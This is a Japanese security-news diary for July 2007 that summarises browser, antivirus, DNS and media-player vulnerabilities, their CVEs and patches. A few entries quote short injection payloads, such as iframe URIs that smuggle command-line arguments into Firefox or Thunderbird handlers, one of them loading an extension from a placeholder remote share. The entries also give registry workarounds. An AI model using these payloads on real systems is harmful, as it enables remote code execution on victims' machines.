セキュリティホール memo - 2007.07

Last modified: Sun Dec 2 23:48:48 2007 +0900 (JST)


 このページの情報を利用される前に、注意書きをお読みください。


2007.07.31

Firefox 2.0.0.6 リリースノート
(mozilla-japan.org, 2007.07.31)

 Firefox 2.0.0.6 登場。2 件の欠陥が修正されている。佐藤さん情報ありがとうございます。

サイボウズ Office 6 に 3 つの弱点
(サイボウズ, 2007.07.27)

 サイボウズ Office 6 に 3 つの弱点。Pasiri さん情報ありがとうございます。

 サイボウズ Office 6.6 (1.4) で修正されている。 サイボウズ Office 6.6 (1.4) では Windows Vista 上での不具合も修正されているようだ。Windows Vista への対応について (サイボウズ)

いろいろ (2007.07.31)
(various)


2007.07.30

tDiaryの脆弱性に関する報告(2007-07-23)
(tDiary, 2007.07.23)

 tDiary 2.0.x / 2.1.x に欠陥。

  1. makerss.rb プラグインまたは whatsnew-list.rb プラグインを使って RSS を生成しており、かつ
  2. URL にドメイン名ではなく IP アドレスを直接指定した場合でも tDiary にアクセスでき、かつ
  3. tdiary.conf において base_url を指定していない

場合に、第三者によるツッコミが不正な Host: ヘッダを含んでいると、任意のサイトを指すような RSS が生成されてしまう。

 将来の安定版で修正される予定。 tdiary.conf において base_url に日記の URL を指定すれば回避できる。

 関連: RSSで任意のドメインに誘導されてしまう脆弱性 (水無月ばけらのえび日記, 2007.07.27)

Mozilla Protocol Abuse: Cross-application URL handler command injection, Firefox and Thunderbird Demo
(Larholm.com, 2007.07.25)

 Thunderbird 2.0.0.4 以前と Firefox 2.0.0.5 以前の組みあわせ、および Mozilla / Netscape Navigator / Outlook / Outlook Express に欠陥。 特定の URI ハンドラが設定されている場合に、 <iframe src='mailto://me@nowhere.com" -install-global-extension \\serverip\shared\cmd.xpi'></iframe> のような mailto: URI を使って、remote から任意のコマンドを実行させることができる。 CVE-2007-4038 (Thunderbird + Firefox) CVE-2007-4039 (Mozilla) CVE-2007-4040 (Outlook / Outlook Express)

 Thunderbird 2.0.0.5 + Firefox 2.0.0.5 ではこの欠陥は発現しない。 -osint フラグのおかげのようです。

Remote Command Execution in FireFox et al
(Billy (BK) Rios, 2007.07.24)

 Firefox 2.0.0.5 / 3.0a6 以前、Netscape Navigator 9 に欠陥。 IE 7 がインストールされた環境で、mailto / nntp / news / snews / telnet URI に %00 (NULL) を含む文字列を指定すると、任意のローカルプログラムを起動できてしまう。 Remote Command Exec (FireFox 2.0.0.5 et al) にデモコードが掲載されている。 IE 6 がインストールされた環境では、この欠陥は発現しない。 CVE-2007-4041 (Firefox)、 VU#783400CVE-2007-4042 (Netscape)。

 Bug 389580 - some schemes with %00 launch unexpected handlers on windows (mozilla.org) や SA26201: Microsoft Windows URI Handling Command Execution Vulnerability (secunia) によると、この欠陥は必ずしも %00 で発現するわけではないようだ。 CreateUri Function (MSDN) に正規化手順が掲載されている。

 Firefox 2.0.0.6 で修正される予定。

2007.07.31 追記:

 Firefox 2.0.0.6 ではまだ修正されていない。


2007.07.27


2007.07.26


2007.07.25

Firefox 2.0.0.5にパスワードが盗まれる脆弱性
(Open Tech Press, 2007.07.25)

  Holes in Firefox password manager [Update] (heise security, 2007.07.20) (デモサイト) の話。 CIS Finds Flaws in Firefox v2 Password Manager に類似した、ただし JavaScript を必要とする欠陥がある模様。Safari も同様らしい。

いろいろ (2007.07.25)
(various)

アンチウイルス製品方面いろいろ
(various)

Panda
Kaspersky
Norman

 スキャンエンジン 5.91.02 以降では直っているようです。

CA

BIND 9 DNS Cache Poisoning
(trusteer.com, 2007.07.15)

 BIND 9.x を DNS cache サーバとして運用した場合に欠陥。 transaction ID の生成に用いる擬似乱数生成器 (PRNG) に欠陥があり、これを利用されると DNS cache 汚染を招く。 CVE-2007-2926

 BIND 9.2.8-P1, BIND 9.3.4-P1, BIND 9.4.1-P1 で修正されている。

2007.08.20 追記:

 [EXPL] DNS Cache Poison (BIND 9) (SecuriTeam, 2007.08.07)

2007.08.29 追記:

 bind 8 にも同様の欠陥があり、BIND 8.4.7-p1 が出ている。

 ただし、bind 8 はもはやメンテナンスが終了しているため、bind 9 の最新版へ移行することが望ましい。

追記

Flash Player update available to address security vulnerabilities

 忘れられたWii対応? Flashパッチのバージョン番号に混乱 (ITmedia, 2007.07.24) より:

Kasperskyによると、WiiのFlash Player 7.0.70.0は、ほかのプラットフォーム用の7.0.70.0よりも前の日付になっており、同じものでないことは明らかだという。AdobeのサイトにWiiについての記載はなく、Wiiのことは忘れられているようだという。

 バージョン番号が同じでも日付が違うのはよくあることなので別にいいのですが、中身まで違っていると困るのですよね……。


2007.07.24

追記

Flash Player update available to address security vulnerabilities

 Flashの脆弱性でWiiもフリーズ状態に (ITmedia, 2007.07.23)、Wii gets Flashed by a bug too! (symantec blog, 2007.07.20)。あれぇ? バージョン番号からすると、欠陥の影響を受けないはずなんだけどなぁ……。PS3 はどうなんだろう。

モーニングスター社 web ページがウイルスに感染か

 モーニングスター社 (www.morningstar.co.jp) トップページが「モーニングスターウエブサイトのご利用の皆さまへのお願い」になっています。Last Modified: は Mon, 23 Jul 2007 13:46:56 GMT です。昨夜ようやくですか……。google の「このサイトはコンピュータに損害を与える可能性があります」 表示は継続中です。

 関連:


2007.07.23

モーニングスター社 web ページがウイルスに感染か
([memo:9295], 2007.07.23)

 「投資信託を中心とした金融商品全般を第三者の立場から格付する情報専門サイト」 モーニングスター社 (www.morningstar.co.jp) が、1 週間ほど前から (いろいろな?) ウイルスがついたり剥がされたりしているようです。

 モーニングスター社が「このサイトはコンピュータに損害を与える可能性があります。」になったにもあるように、ぐぐると、このサイトはコンピュータに損害を与える可能性がありますと言われてしまいます [画像]。 リンクをたどるとこんな感じ [画像]

 …… @IT から関連記事出てます: 「このサイトはコンピュータに損害を与える可能性」  国内サイトにも警告——グーグルのマルウェア警告機能に存在感 (@IT, 2007.07.23)。モーニングスターとエキサイト携帯ホームページ (魔法のiらんど) を例に解説しています。

モーニングスターのプロダクトサービス部によると、同社サイトは7月17日ごろに実際にトロイの木馬型ウイルスである「Exploit-MS06-014」(マカフィーの解説ページ)に感染し、「アクセスすると危険な状態」(同部)となった。外部から指摘を受けてウイルスを駆除し、「いまはアクセスしても大丈夫」という。

 いつから「大丈夫」なのか不明ですね。

ただ、「どういった形でウイルスに感染したのかはまだ特定できていない」ともいい、セキュリティベンダに調査と根本的な対策を依頼している。

 本当に「いまはアクセスしても大丈夫」なのでしょうか……。

2007.07.24 追記:

 モーニングスター社 (www.morningstar.co.jp) トップページが「モーニングスターウエブサイトのご利用の皆さまへのお願い」になっています。Last Modified: は Mon, 23 Jul 2007 13:46:56 GMT です。昨夜ようやくですか……。google の「このサイトはコンピュータに損害を与える可能性があります」 表示は継続中です。

 関連:


2007.07.20

MacBookの発火事故
(slashdot.jp, 2007.07.20)

 「現行の1つ前のMacBook(CoreDuo 2GHz)が今月13日に発火した」のだそうだ。 「アップルさまの希望により記事を削除」というのが、いかにもアップルですな。臭いものには蓋で GO!

 CoreDuo の奴が特にだめだめなのかなぁ……?

(新たなお願い)ノートPC用バッテリパックの事故に伴う自主交換プログラムについて
(東芝, 2007.07.19)

 東芝製 note PC でバッテリーが原因となる発火事故が 3 件発生。 昨年から話題になっている話とは別の話なので注意。 「当該ロットのバッテリを使用したバッテリパックの無償交換プログラム」を実施するそうなので、東芝製 note PC 利用者は確認を。

追記

Changelog for Opera 9.22 for Windows

 関連: [Full-disclosure] iDefense Security Advisory 07.19.07: Opera Software Opera Web Browser BitTorrent Dangling Pointer Vulnerability

IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク

 この欠陥ですが、Firefox だけでなく Thunderbird にも影響するそうです。

 Thunderbird 2.0.0.5 で修正されるそうですが、Thunderbird 2.0.0.5 はまだ公開されていません。……とか言ってる間に出てました。

 iDefense からも出てました: [Full-disclosure] iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability。 Microsoft 的には、Registering an Application to a URL Protocol (MSDN) でも広報していた仕様だったようで。MSDN に例示されていた note: URI ハンドラが実装された場合、

<iframe src='note:"|calc.exe '>

というタグで calc.exe が自動で起動されたようです。MSDN ページ、現在は改訂されています。

 iDefense によると、少なくとも次の URI ハンドラに問題がある (あった) そうです。

HKEY_CLASSES_ROOT\FirefoxURL\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.mailto\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.news\shell
HKEY_CLASSES_ROOT\mailto\shell
HKEY_CLASSES_ROOT\news\shell

いろいろ (2007.07.20)
(various)


2007.07.19

Changelog for Opera 9.22 for Windows
(Opera, 2007.07.19)

 Opera 9.22 登場。 data: URL の件 (CVE-2007-3819) を含め、 複数のセキュリティ修正がある模様。

2007.07.20 追記:

 関連: [Full-disclosure] iDefense Security Advisory 07.19.07: Opera Software Opera Web Browser BitTorrent Dangling Pointer VulnerabilityCVE-2007-3929

追記

Firefox 2.0.0.5 Release Notes

 日本語な案内も出ました:

 内訳:

Oh Look. An Apple WORM?
(McAfee blog, 2007.07.18)

 Mac OS X 10.4.x の MDNSResponder に関する 0-day な欠陥を利用したワームの PoC コードが実在する模様。関連: 24924 - Apple Mac OS X mDNSResponder Variant Unspecified Remote Code Execution Vulnerability (securityfocus)

Googleに激しく嫌われたらしい - 検索結果順位が極端に下がった
(Semplice, 2007.07.19)

 検索順位が下がるだけならまだ理解できるけど、なぜわざわざこの文章が表示されるのかというのがよくわからないな……。いったいどういう「自動処理」なんだろう。

Semplice
(直接の関わりは無いが、Googleは「Stop Badware Coalition」なる団体に参加していながら、多くの悪質な詐欺ソフトウェアをスポンサード広告として表示していた過去がある(Googleの広告に潜む、マルウェア配布者による広告(2006年3月22日, Semplice...
blog.lucanian.net/ - 71k - キャッシュ - 関連ページ

 Yahoo! Japan だと 3 位でこのように表示されますね。

Semplice
マルウェアの解説、対策、関連ニュースの考察。 ... Sempliceのトップへ > 雑文 カテゴリ >この記事への固定リンク ... 記事の転載や引用に際しては、Sempliceよりの転載と引用そしてリンクについてのお願いをまずは閲覧下さい。 ...blog.lucanian.net -ブックマーク:12人が登録-キャッシュ

2007.07.18

いろいろ
(various)

トレンドマイクロ CSM / OfficeScan 方面
(iDefense, 2007.07.16)

 トレンドマイクロの Client Server Messaging Security for Small and Medium Business 3.0 / 3.5 / 3.6、OfficeScan Corporate Edition 6.5 / 7.0 / 7.3 / 8.0、OfficeScan 6.0 in Client/Server/Messaging Suite for SMB 2.0 の CGI モジュールに 2 つの欠陥。

 patch が出ているので適用すればよい。

 Client Server Messaging Security for Small and Medium Business は日本で言うところの ウイルスバスター ビジネスセキュリティOfficeScanウイルスバスター コーポレートエディション でいいんですかね。ダウンロードページ:

 今回のモノの日本語版はまだありません。

 US では 2006.10.19 に登場している Client/Server/Messaging Security 3.0 Patch 1 for SP1 は、日本では 2007.04.18 ですね (ウイルスバスタービジネスセキュリティ 3.0 用 Service Pack 1 Patch 1)。トレンドマイクロのリリースエンジニアリングってどうなってるの? なんだか 1990 年代のマイクロソフトを連想してしまうのですけど。

2007.08.02 追記:

 日本語版 patch 出ました。

 ウイルスバスター コーポレートエディション 8.0 用の patch ですが、英語版は build 1042 なのに日本語版は build 1043 ですね。

Oracle Critical Patch Update - July 2007
(Oracle, 2007.07.17)

 Oracle patch 2007.07 版出ました。

そろそろ UTF-7 について一言いっとくか
(葉っぱ日記, 2007.07.17)

 Web アプリの出力において、IE が正しく判別できない charset が指定されていると、IE はそれを UTF-7 と誤認する場合があり、その場合に XSS 欠陥が発現する話。 IE が正しく判別できる charset は HKCR\MIME\Database\charset に列挙されているそうだ。

追記

McAfeeのエンタープライズ向けソフトに脆弱性、修正パッチが公開

 Free ePO Vulnerability Scanner (eEye Research, 2007.07.17)

IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク

 Firefox 2.0.0.5 が登場しました。 ハンドラですが、次のようになっています。

[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -requestPending -osint -url "%1"

 あと、IE + Firefox2 の脆弱性 追記 (水無月ばけらのえび日記, 2007.07.16) に FirefoxHTML には罪はないという話が出ていました。

Firefox 2.0.0.5 Release Notes
(mozilla.com, 2007.07.14)

 Firefox 2.0.0.5 登場。IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスクの話のセキュリティ修正などが含まれているはずだが、Fixed in Firefox 2.0.0.5 はまだ存在しない。……あ、できたみたい。合計 8 種類ですね。

 IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスクへの対応として URL ハンドラを削除した場合でも、2.0.0.5 にアップデートすると再作成されました。

2007.07.19 追記:

 日本語な案内も出ました:

 内訳:

Critical:
High:
Moderate:
Low:

2007.07.17

FreeBSD-SA-07:05.libarchive - Errors handling corrupt tar files in libarchive(3)
(FreeBSD, 2007.07.12)

 FreeBSD 5.3 以降の libarchive(3) に欠陥。 tar / pax ファイルの処理に欠陥があり、buffer overflow が発生して任意のコードを実行できる (CVE-2007-3641) 他、無限ループ (CVE-2007-3644) やクラッシュ (CVE-2007-3645) が発生する。 tar を利用した場合に欠陥が発現する。

 5-STABLE / RELENG_5_5, 6-STABLE / RELENG_6_1 / RELENG_6_2 の最新ソースで修正されている。通常は libarchive と rescue をつくりなおせばよいのだが、amd64 プラットホームにおいて i386 互換ライブラリを利用している場合には make world が必要になる。

追記

Flash Player update available to address security vulnerabilities

 関連:


2007.07.16


2007.07.15

追記

JVN#44724673: Java Web Start において許可されていないシステムクラスが実行される脆弱性

 JDK / JRE 5 Update 6 以降や JDK / JRE 6 では、古いバージョンの JRE を指示された場合の扱いが改善されており、最新版をインストールさえすればよいようだ。 続・厚生労働省の脆弱性放置は何が問題とされているのか (高木浩光@自宅の日記, 7/10) の「Java Updateしても古いJREが消えない問題」を参照。

 セキュリティベースラインにどのようなバージョンが指定されているのかは、Java SE のリリースノートに明記されている。たとえば Java SE 6 Update Release Notes (Sun) の「1.6.0_02 での変更点」を見ると、 こんな表がある。

JRE Family Version Security Baseline
5.0 1.5.0_12
1.4.2 1.4.2_14
102934: Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges

 元ねたと CVE が公開されている。

  • CESA-2006-004 - rev 2: JDK image parsing library vulnerabilities (ICC parsing, BMP parsing) (Chris Evans)。

    • 画像ファイルの ICC プロファイルの処理に integer overflow する欠陥があり、任意のコードを実行できる。 JPEG パーサと BMP パーサは ICC プロファイルをサポートしているため、この欠陥の影響を受ける。サンプル JPEG ファイルが公開されている。 CVE-2007-2788

    • BMP パーサに local file を開くことができる欠陥があり、少なくとも DoS 攻撃を実施できる。 サンプル BMP ファイルが公開されている。 CVE-2007-2789

2007 年 7 月のセキュリティ情報

 上記した 7月のセキュリティ リリース 後のまとめ (日本のセキュリティチームの Blog, 2007.07.13) において 940297 - Windows XP SP2 に .Net Framework を再インストールする方法 が紹介されていたので追記。


2007.07.13

High Risk Vulnerability in AVG Antivirus
(NGSSoftware, 2007.07.13)

 AVG AntiVirus に欠陥。カーネルモードサービスドライバ avg7core.sys に欠陥があり、local user が任意のアドレスに任意のデータを書き込める。 CVE-2007-3777

 AVG 7.5 build 476 (avg7core.sys 7.5.0.476) で修正されている。 ダウンロード: AVG Anti-Virus Professional Edition 7.5 (full version)AVG Anti-Virus Free Edition 7.5

QuarkXPress Word File Import Filter Buffer Overflow Vulnerability
(vuln.sg, 2007.07.11)

 QuarkXPress 7.2 for Window に欠陥。Word 6-2000 Filter.xnt に stack overflow する欠陥があり、攻略 Word ファイルによって任意のコードを実行できる。 PoC コードが公開されている。 CVE-2007-3678

 patch はまだない。

Secretly Monopolizing the CPU Without Superuser Privileges
(Dan Tsafrir, 2007.04.14)

 kernel スケジューラ方面の話みたい。USENIXSecrity '07 で発表されたのだそうで。 よくわかんないけど、local user が DoS 攻撃できるみたい。 CVE-2007-3724 (XP) CVE-2007-3723 (Solaris) CVE-2007-3722 (FreeBSD 4BSD) CVE-2007-3721 (FreeBSD ULE) CVE-2007-3720 (Linux 2.4) CVE-2007-3719 (Linux 2.6.16)

いろいろ (2007.07.13)
(various)

追記

McAfeeのエンタープライズ向けソフトに脆弱性、修正パッチが公開

 日本語版:

2007 年 7 月のセキュリティ情報

 関連:

IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク

 関連: IE関与の脆弱性、Firefox側が対処を表明 (ITmedia, 2007.07.13)。 CVE-2007-3670

SYM07-019: Symantec AntiVirus Malformed RAR and CAB Compression Type Bypass
(Symantec, 2007.07.11)

 これだけなぜかまだ日本語版が出ていませんので、以下の記述において、日本で発売されている製品・バージョンとは異なる可能性があります。

 シマンテックの、ゲートウェイ系の製品や Norton AntiVirus / Norton Internet Security / Norton System Works 2004 / 2005 / 2006, Norton Personal Firewall 2006, Norton AntiVirus for Macintosh 9.x / 10.x, Norton Internet Security / Norton SystemWorks for Macintosh 3.x, Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x などに欠陥。 攻略 RAR ファイルによる DoS、攻略 CAB ファイルによって任意のコードの実行が可能。日吉さん情報ありがとうございます。 CVE-2007-3699 CVE-2007-0447

 修正版については SYM07-019 の記述を参照。

SYM07-018: Symantec SYMTDI.SYS デバイスドライバに、ローカルで特権昇格の脆弱性
(シマンテック, 2007.07.11)

 Norton AntiVirus / Norton Internet Security / Norton Personal Firewall / Norton System Works 2005 / 2006, Norton AntiSpam 2005, Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x、Symantec Client Security (SCS) 2.0.x / 3.0.x / 3.1.x に欠陥。SYMTDI.SYS に欠陥があり、local user が SYSTEM 権限で任意のコードを実行できる。 CVE-2007-3673

 Norton AntiVirus / Norton Internet Security / Norton Personal Firewall / Norton System Works 2005 / 2006, Norton AntiSpam 2005 については LiveUpdate を実行することで修正される。SAV CE と SCS については、 SAV CE 9 MR6 MP1 以降 / SAV 10.1 MR6 以降、SCS 2.0 MR6 MP1 以降 / SCS 3.1 MR6 以降にアップグレードして対応する。

 関連: Symantec AntiVirus symtdi.sys Local Privilege Escalation Vulnerability (iDefense)

SYM07-017: Symantec AntiVirus Corporate Edition にローカルで特権昇格の脆弱性
(シマンテック, 2007.07.11)

 Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x、Symantec Client Security (SCS) 2.0.x / 3.0.x / 3.1.x に欠陥。 Real-Time スキャナ (RTVScan) に欠陥があり、local user が SYSTEM 権限を取得できる。 CVE-2006-3455

 SAV CE 9.0.6 MR6 MP1 (ビルド 1100) 以降 / 10.1.4 MR4 MP1 (ビルド 4010) 以降、 CS 2.0.6 MR6 MP1 (ビルド 1100) 以降 / SCS 3.1.4 MR4 MP1 (ビルド 4010) 以降にアップグレードして対応する。

SYM07-016: Symantec Client Security の Internet E-mail Auto-Protect 機能にスタックオーバーフローの脆弱性
(シマンテック, 2007.07.11)

 Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0、Symantec Client Security (SCS) 2.0.x / 3.0.x に欠陥。 Internet E-mail Auto-Protect 機能に欠陥があり、メールの From:, To:, Subject: が 951 バイト以上だと buffer overflow し DoS が発生。 CVE-2006-3456

 SAV CE 9 MR6 (SAV CE 9.0.6.1000) 以降 / 10.1 以降、SCS 2.0.6 MR6 (ビルド 1000-31) 以降 / SCS 3.1 以降にアップグレードして対応する。

SYM07-015: Symantec Backup Exec for Windows Server : RPC インタフェースにヒープオーバーフローによるサービス拒否の脆弱性
(シマンテック, 2007.07.11)

 Backup Exec for Windows Servers 10.0 / 10d / 11d に欠陥。 RPC インタフェースに欠陥があり、remote から DoS 攻撃を受ける。 CVE-2007-3509

 HotFix があるので適用すればよい。

 関連: Symantec Backup Exec RPC Remote Heap Overflow Vulnerability (iDefense)。6106/tcp だそうです。


2007.07.12

McAfeeのエンタープライズ向けソフトに脆弱性、修正パッチが公開
(ITmedia, 2007.07.12)

 McAfee Common Management Agent (CMA) に 4 つの欠陥。

2007.07.13 追記:

 日本語版:

2007.07.18 追記:

 Free ePO Vulnerability Scanner (eEye Research, 2007.07.17)

[Clamav-announce] announcing ClamAV 0.91
(clamav, 2007.07.11)

 ClamAV 0.91 登場。[Full-disclosure] Advisory - Clam AntiVirus RAR File Handling Denial Of Service Vulnerability が修正されている。 CVE-2007-3725

About the security content of QuickTime 7.2
(Apple, 2007.07.11)

 QuickTime 7.2 登場。8 つの欠陥が修正されています。 攻略 QuickTime movie, H.264 movie, .m4v ファイル, SMIL ファイルによって任意のコードを実行できる他、QuickTime for Java に関して 3 つの欠陥があり、 攻略 Java アプレットを使って任意のコードを実行したり、クライアントの画面をキャプチャしたりできる模様。 CVE-2007-2295 CVE-2007-2392 CVE-2007-2296 CVE-2007-2394 CVE-2007-2397 CVE-2007-2393 CVE-2007-2396 CVE-2007-2402

 ダウンロード:

 ……Windows 2000 にインストールできなくなってますね…… orz

 関連: Apple QuickTime SMIL File Processing Integer Overflow Vulnerability (iDefense)

2007.09.04 追記:

  [Full-disclosure] Apple QuickTime integer overflow vulnerability when parsing SMIL fileCVE-2007-2394 の件。

IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク
(CNET, 2007.07.11)

 Firefox 2.x を Windows にインストールしている場合に、IE 上に欠陥が発生する。 Firefox 2.x をインストールすると、次の FirefoxURL:// URI ハンドラが設定される。

[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -url "%1" -requestPending

 このため、たとえば %1 に FirefoxURL://foo" -chrome "javascript:hogehoge... が入るようなアンカータグを設置しておくと、IE でそのリンクを踏んだ場合に firefox.exe -url "FirefoxURL://foo" -chrome "javascript:hogehoge..." -requestPending が起動されてしまう。Firefox 自身が FirefoxURL:// を扱う場合にはこうならないように内部処理されているようなのだが、IE の場合にはキケンな状況になるようだ。 詳細については Internet Explorer 0day Exploit (Larholm.com, 2007.07.10) を参照。危険なアンカータグの実例つき。 FirefoxURL:// の他に FirefoxHTML:// や Firefox.URL:// も危険な模様。

 この状況を回避するには、上記の URI ハンドラ (レジストリ設定) を削除すればよい。 Blocking the Firefox -> IE 0-day (Jesper's Blog, 2007.07.10) では次のコマンドを解説している。

reg delete HKCR\FirefoxHTML /f
reg delete HKCR\FirefoxURL /f
reg delete HKCR\Firefox.URL /f

 Windows 2000 用の reg コマンドは Windows 2000 Support Tools に含まれている。

2007.07.13 追記:

 関連: IE関与の脆弱性、Firefox側が対処を表明 (ITmedia, 2007.07.13)。 CVE-2007-3670

2007.07.18 追記:

 Firefox 2.0.0.5 が登場しました。 ハンドラですが、次のようになっています。

[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]
C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -requestPending -osint -url "%1"

 あと、IE + Firefox2 の脆弱性 追記 (水無月ばけらのえび日記, 2007.07.16) に FirefoxHTML には罪はないという話が出ていました。

2007.07.20 追記:

 この欠陥ですが、Firefox だけでなく Thunderbird にも影響するそうです。

 Thunderbird 2.0.0.5 で修正されるそうですが、Thunderbird 2.0.0.5 はまだ公開されていません。……とか言ってる間に出てました。

 iDefense からも出てました: [Full-disclosure] iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability。 Microsoft 的には、Registering an Application to a URL Protocol (MSDN) でも広報していた仕様だったようで。MSDN に例示されていた note: URI ハンドラが実装された場合、

<iframe src='note:"|calc.exe '>

というタグで calc.exe が自動で起動されたようです。MSDN ページ、現在は改訂されています。

 iDefense によると、少なくとも次の URI ハンドラに問題がある (あった) そうです。

HKEY_CLASSES_ROOT\FirefoxURL\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.mailto\shell
HKEY_CLASSES_ROOT\Thunderbird.Url.news\shell
HKEY_CLASSES_ROOT\mailto\shell
HKEY_CLASSES_ROOT\news\shell

Photoshop CS2 and CS3 updates to address security vulnerabilities
(Adobe, 2007.07.11)

 Adobe Photoshop CS2 / CS3 に欠陥。攻略 BMP, DIB, RLE, PNG ファイルを使って任意のコードを実行できる。 CVE-2007-2244 CVE-2007-2365

 CS2 / CS3 の Windows / Mac 用の修正プログラムが配布されているので適用すればよい。

Flash Player update available to address security vulnerabilities
(Adobe, 2007.07.11)

 Flash Player 9.0.45.0 以前 / 8.0.34.0 以前 / 7.0.69.0 以前に欠陥。

 Flash Player 9.0.47.0 / 8.0.35.0 / 7.0.70.0 で修正されている。 Wii や Play Station 3 の Web ブラウザについているのは 7.0.70.0 の模様。

 関連: Flash Player のために信頼しなければならないドメイン (水無月ばけらのえび日記)

2007.07.17 追記:

 関連:

2007.07.24 追記:

 Flashの脆弱性でWiiもフリーズ状態に (ITmedia, 2007.07.23)、Wii gets Flashed by a bug too! (symantec blog, 2007.07.20)。あれぇ? バージョン番号からすると、欠陥の影響を受けないはずなんだけどなぁ……。PS3 はどうなんだろう。

2007.07.25 追記:

 忘れられたWii対応? Flashパッチのバージョン番号に混乱 (ITmedia, 2007.07.24) より:

Kasperskyによると、WiiのFlash Player 7.0.70.0は、ほかのプラットフォーム用の7.0.70.0よりも前の日付になっており、同じものでないことは明らかだという。AdobeのサイトにWiiについての記載はなく、Wiiのことは忘れられているようだという。

 バージョン番号が同じでも日付が違うのはよくあることなので別にいいのですが、中身まで違っていると困るのですよね……。

追記

2007 年 7 月のセキュリティ情報

 出ました。

 Microsoft Update失敗したらageるスレ 15 では、.NET Framework 1.x / 2.x の patch のインストールに失敗する事例が複数報告されている。 この場合には、次のようにするとよいらしい。

  1. Windows Installer CleanUp ユーティリティをインストールする
  2. Windows Installer CleanUp ユーティリティを使って .NET Framework の構成情報を全て削除
  3. .NET Framework 本体、Service Pack (もしあれば)、セキュリティ patch を再インストール

 あと、.NET Framework 3.0 は 2.0 のスーパーセットなので、.NET Framework 3.0 だけが入っている環境でも 2.0 相当部分に対して patch の適用が必要 (Microsoft Update とかすると patch の適用を求められる) ようです。

 関連:


2007.07.11


2007.07.10

[Full-disclosure] Anti-DNS Pinning and Java Applets
(Full-disclosure, 2007.07.10)

 Anti-DNS Pinning 関連話。Firefox 2 / IE 7 + JRE 5 / 6 で動くそうです。

 Anti-DNS Pinning の一般知識について日本語で読みやすいのはこのあたりでしょうか。

 ウェブアプリケーションセキュリティが発売されれば、それがいちばん読みやすくなるのかな。うぅむハードカバーですか……。

[Full-disclosure] EEYE: Sun Java WebStart JNLP Stack Buffer Overflow Vulnerability
(eEye, 2007.07.10)

 Sun JDK / JRE 5 Update 11 以前, JDK / JRE 6 Update 1 以前に欠陥。 Java WebStart に欠陥があり、攻略 JNLP ファイルを開くと任意のコードを実行される。攻略 Web ページに攻略 JNLP ファイルを仕掛けることで、ActiveX の助けを借りることなく攻略可能。 CVE-2007-3655

 Sun JDK / JRE 5 Update 12, JDK / JRE 6 Update 2 で修正されている。

 なお、Sun JDK / JRE 5 Update 11 以前, SDK / JRE 1.4.2_13 以前には他にも (?) Java WebStart 方面の欠陥があり、JDK / JRE 5 Update 12, SDK / JRE 1.4.2_14 で修正されている模様。

WinPcap NPF.SYS Local Privilege Escalation Vulnerability
(iDefense, 2007.07.09)

 WinPcap 4.0 (Wireshark 0.99.5 に同梱) に欠陥。NPF.SYS に欠陥があり、 local user が kernel 権限で任意のコードを実行できる。 CVE-2007-3681

 WinPcap 4.0.1 で修正されている。

Multiple Vendor GIMP Multiple Integer Overflow Vulnerabilities
(iDefense, 2007.07.09)

 GIMP 2.2.15 以前に複数の欠陥。画像読み込みプラグインに複数の欠陥があり、 攻略 DICOM, PNM, PSD, PSP, Sun RAS, XBM, XWD 画像を使って任意のコードを実行可能。 CVE-2006-4519

 GIMP 2.2.16 で修正されている。

追記

Beware of LZH

 CSIRTメモ: JVN に掲載されたクロスサイト・スクリプティング問題 (日経 IT Pro, 2007.07.10) に今回の話の時系列が出ています。


2007.07.09


2007.07.08

追記

Beware of LZH

 +Lhaca 1.21 にもまだ欠陥が残っていた話の詳細:

いろいろ (2007.07.08)
(various)


2007.07.07


2007.07.06

追記

102934: Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges

 2007.06.29 付で更新されており、SDK / JRE 1.4.2_15 も入手できるようになっている。

2007 年 7 月のセキュリティ情報
(Microsoft, 2007.07.06)

 もうそんな時期なんですね。

 新しい事前通知ですが、Microsoft としてはフィードバックを求めているそうです。

2007.07.12 追記:

 出ました。

 Microsoft Update失敗したらageるスレ 15 では、.NET Framework 1.x / 2.x の patch のインストールに失敗する事例が複数報告されている。 この場合には、次のようにするとよいらしい。

  1. Windows Installer CleanUp ユーティリティをインストールする
  2. Windows Installer CleanUp ユーティリティを使って .NET Framework の構成情報を全て削除
  3. .NET Framework 本体、Service Pack (もしあれば)、セキュリティ patch を再インストール

 あと、.NET Framework 3.0 は 2.0 のスーパーセットなので、.NET Framework 3.0 だけが入っている環境でも 2.0 相当部分に対して patch の適用が必要 (Microsoft Update とかすると patch の適用を求められる) ようです。

 関連:

2007.07.13 追記:

 いろいろ更新されている。

 関連:

2007.07.15 追記:

 上記した 7月のセキュリティ リリース 後のまとめ (日本のセキュリティチームの Blog, 2007.07.13) において 940297 - Windows XP SP2 に .Net Framework を再インストールする方法 が紹介されていたので追記。

2007.08.03 追記:

 更新情報

2007.12.02 追記:

 Windows Server 2003 に MS07-039 patch または SP2 を適用した場合に発生する不具合の話:

 シングルドメインの場合には関係ありません。


2007.07.05


2007.07.04


2007.07.03

企業幹部を狙った攻撃が拡大--セキュリティ企業が明らかに
(CNET, 2007.07.03)

 企業内の機密情報を狙った標的型攻撃が深く静かに浸透中のようです。

追記

